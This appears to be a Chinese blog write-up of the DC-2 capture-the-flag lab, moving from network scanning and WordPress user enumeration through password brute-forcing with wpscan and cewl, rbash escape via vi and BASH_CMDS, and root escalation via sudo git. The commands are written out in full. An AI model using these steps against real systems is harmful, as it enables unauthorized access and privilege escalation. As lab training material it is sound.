DC-2靶机渗透测试

靶机所需环境

  • 目标靶机:DC-2(192.168.160.161)
  • 攻击机:Kali Linux(192.168.160.156)

信息收集

  • 开启DC-5和Kali Linux,使用arp-scan -l命令查看该网段下的存活主机,猜测靶机IP为161;
arp-scan -l

在这里插入图片描述

  • 成功得到靶机IP后,对其进行端口开放及其服务信息收集,使用nmap命令扫描全端口,-sV是显示端口服务开放详细信息;
nmap -sV 192.168.160.161 -p1-65535

在这里插入图片描述

漏洞利用

  • 访问IP下80端口,成功访问;

在这里插入图片描述

flag

  • 点击flag,看到一些信息,大概意思就是可以测试其他用户登录;

在这里插入图片描述

  • 既然要登录,那肯定就有登录页面,这里就不使用之前的dirb扫描工具了,介绍一个新的工具叭也是kali自带的,nikto工具进行扫描,成功扫出登录页面;
nikto -h dc-2 -o dc2.txt

在这里插入图片描述

  • 访问该页面,成功看到登录框;

在这里插入图片描述

  • 还是和之前一样的思路,使用命令扫描用户成功得到三个用户;
wpscan --url http://dc-2 -e u``

在这里插入图片描述

  • 将这三个用户放入user.txt文件中,回到那段信息发现里有一个cewl,后来看到其他大佬的文章才知道原来是一个生成密码字典的工具;
cewl http://dc-2/ -w passwd.txt

在这里插入图片描述

  • **用户和密码的文件都有了,接下来准备进行爆破; **
wpscan --url http://dc-2 -U user.txt -P passwd.txt

在这里插入图片描述

flag2

  • 直接登录tom用户,看了一圈没有发现什么有价值的信息,继续登录jerry用户登录,看到flag2提示信息说让我们看看其他切入点;

在这里插入图片描述

  • 由于IP一共只开放了两个端口,所以另一个切入点放到了远程ssh服务7744端口上,发现可以成功登录tom用户,但是jerry用户登录失败;

在这里插入图片描述

flag3

  • ls命令查看发现flag3文件,但却无法执行cat命令,查看后才发现tom用户不能执行cat命令,但可以使用vi等命令,执行vi命令打开文件;

在这里插入图片描述

  • 发现里面提到了jerry用户和su命令,猜测可能是让我们提权,但是su命令无法使用,使用vi提权;

vi flag3.txt
Shift+分号然后输入以下内容
:set shell=/bin/sh
:shell

flag4

进入jerry目录,发现flag4文件并查看,里面有个git命令猜想可能用于提权;

在这里插入图片描述
在这里插入图片描述

  • 尝试进入root命令但权限不够失败了,想切换jerry用户但有无法使用su命令,后面发现可以使用rbash环境变量的方法进行提权;
export -p						//查看环境变量
BASH_CMDS[a]=/bin/sh;a			//把/bin/sh给a
/bin/bash
export PATH=$PATH:/bin         	//添加环境变量
export PATH=$PATH:/sbin:/bin   	//添加环境变量

在这里插入图片描述

  • 执行命令查看带有suid权限的命令;
find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

flag5

  • 发现有个sudo命令,看看什么权限,告诉git命令可以以root权限运行;

在这里插入图片描述

成功提权

  • 使用git命令进行提权操作;
方法1
sudo git help config 
!/bin/bash 或 !'sh' 	//在末行命令模式输入 
 
方法2
sudo git -p help 
!/bin/bash 或 !'sh' 	//输入!/bin/bash,即可打开一个用户为root的shell

在这里插入图片描述

  • 成功提权至root用户,看到最终flag;

在这里插入图片描述
上一篇 > DC-1靶机渗透测试

下一篇 > DC-3靶机渗透测试

以上内容就是DC-2靶机渗透测试的全过程,如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵一下,我也会慢慢去改进和提高的,请各位小伙伴多多支持,走之前别忘了点个赞哟😁!

以上内容仅供学习参考使用,切勿用于非法用途,切勿用于非法用途,切勿用于非法用途!!!重要的事情说三遍

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值